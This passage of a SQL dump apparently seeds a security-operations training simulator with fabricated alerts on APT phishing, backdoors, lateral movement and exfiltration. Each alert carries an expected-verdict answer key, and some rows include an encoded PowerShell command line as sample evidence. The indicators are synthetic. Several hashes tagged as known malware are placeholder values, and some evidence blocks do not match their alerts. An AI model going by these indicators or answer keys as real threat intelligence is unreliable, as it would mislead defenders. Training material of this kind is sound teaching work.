attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1155, 'Malicious Application Execution', 'high', 'Mobile Device Management (MDM) Logs', 'Upon opening the malicious attachment, the malware is executed, establishing a foothold on the target\'s Android device, signaling the start of the espionage operation.', 'Execution', 'T1059.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-25T14:22:34Z\",\"device_id\":\"android-1234567890\",\"user\":\"jdoe@example.com\",\"event\":\"malware_execution\",\"filename\":\"malicious_app.apk\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"device_ip\":\"192.168.1.10\",\"action\":\"app_installation\",\"status\":\"success\"}', '2026-02-07 21:13:37', '2026-02-23 19:31:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"malicious_app.apk\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 50/60 engines\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"suspicious\",\"details\":\"Known command and control server\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1156, 'Backdoor Installation Detected', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The EDR system detected an advanced backdoor installation attempt, indicating an attempt by attackers to maintain persistent access to the device. The backdoor is capable of surviving system reboots and updates.', 'Persistence', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"EDR-2354\",\"hostname\":\"compromised-host.local\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.23.198.45\",\"detected_file\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"process_id\":4820,\"command_line\":\"svchost.exe -k netsvcs\",\"associated_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"detected_by\":\"Advanced Threat Protection Module\"}', '2026-02-07 21:13:37', '2026-02-23 19:51:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.23.198.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known backdoor variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable located in a critical system directory.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Valid user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1157, 'Lateral Movement via Infected Applications', 'high', 'Network Traffic Analysis', 'An advanced threat actor is leveraging compromised applications to facilitate lateral movement within the network. The actor uses a backdoor to deploy these applications, expanding their access to additional internal devices.', 'Lateral Movement', 'T1210: Exploitation of Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"event_type\":\"connection_attempt\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"jdoe\",\"filename\":\"compromised_app_v2.exe\",\"protocol\":\"SMB\",\"action\":\"allowed\"}', '2026-02-07 21:13:37', '2026-02-23 19:56:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal asset within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"compromised_app_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File detected as part of lateral movement attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1158, 'Data Exfiltration to Remote Server', 'critical', 'Firewall and Proxy Logs', 'The operation culminates with the exfiltration of sensitive data, including government communications and military plans, to an external server controlled by the adversaries.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:35:21Z\",\"internal_ip\":\"10.0.15.7\",\"external_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_hash\":\"7d793037a0760186574b0282f2f435e7\",\"file_name\":\"confidential_plans.zip\",\"action\":\"allowed\",\"bytes_sent\":2547893,\"proxy_status\":\"successful\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/upload\"}', '2026-02-07 21:13:37', '2026-02-16 05:01:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.7\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user jdoe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7d793037a0760186574b0282f2f435e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with data exfiltration activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_plans.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive content being exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1159, 'Suspicious Email with Malicious InPage Attachment', 'high', 'Email Gateway Logs', 'Bitter APT initiates the attack by sending phishing emails with malicious InPage documents to government employees. The email contains an attachment titled \'Official_Document.inp\' which is suspected to be malicious.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T10:15:30Z\",\"email_id\":\"msg123456789\",\"sender\":\"bitter.apt@example.com\",\"recipient\":\"john.doe@government.gov\",\"subject\":\"Urgent: Official Document\",\"attachment\":{\"filename\":\"Official_Document.inp\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"size\":102400},\"network\":{\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"192.168.1.100\"},\"email_headers\":{\"from\":\"bitter.apt@example.com\",\"to\":\"john.doe@government.gov\",\"subject\":\"Urgent: Official Document\",\"message_id\":\"<1234567890@example.com>\"}}', '2026-02-07 21:14:20', '2026-02-23 17:44:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"bitter.apt@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known APT group email address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"InPage malware associated with Bitter APT\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Bitter APT command and control server\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Official_Document.inp\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file type for email attachment\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious InPage Attachment\",\"date\":\"2026-02-08T19:00:00.296Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1160, 'Execution of Exploited InPage Document', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious InPage document was opened, triggering its embedded exploit to execute code, resulting in system compromise. This action was detected on an endpoint, indicating the exploitation of an InPage vulnerability.', 'Code Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"EDR-20231010-000567\",\"hostname\":\"compromised-host-01\",\"username\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.42\",\"file_name\":\"invoice_2023.inp\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"process_name\":\"inpage.exe\",\"command_line\":\"\\\"C:\\\\Program Files\\\\InPage\\\\inpage.exe\\\" \\\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice_2023.inp\\\"\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.42\"},{\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\"},{\"type\":\"filename\",\"value\":\"invoice_2023.inp\"},{\"type\":\"username\",\"value\":\"jdoe\"}]}', '2026-02-07 21:14:20', '2026-02-23 17:45:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious InPage document exploit.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.inp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known malicious documents.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Active directory user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1161, 'ArtraDownloader Malware Installation', 'high', 'Host-based Intrusion Detection System (HIDS)', 'ArtraDownloader has been installed on the compromised system to establish persistence and facilitate further attacks.', 'Malware Installation', 'T1546', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:10Z\",\"event_id\":\"4624\",\"message\":\"Installation of ArtraDownloader detected.\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"artradownloader.exe\",\"user\":\"compromised_user\",\"process_id\":\"1234\",\"context\":\"Persistence mechanism added via registry modification.\"}', '2026-02-07 21:14:20', '2026-02-23 19:34:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP known for distributing malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ArtraDownloader malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"artradownloader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Filename linked to ArtraDownloader.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User account showing anomalous behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1162, 'Lateral Movement via Compromised Credentials', 'high', 'Network Traffic Analysis', 'Bitter APT used compromised credentials to access a critical server in the internal network, attempting lateral movement with potential data exfiltration.', 'Credential Access', 'T1078: Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:22:57Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.15\",\"username\":\"j.doe\",\"event\":\"Successful login attempt\",\"protocol\":\"RDP\",\"file_name\":\"bitter_agent.dll\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"status\":\"Accepted\",\"log_id\":\"evt-20231010142257\"}', '2026-02-07 21:14:20', '2026-02-23 19:37:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Bitter APT infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Critical internal server targeted\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee credentials used\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"bitter_agent.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Associated with Bitter APT operations\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash related to Bitter 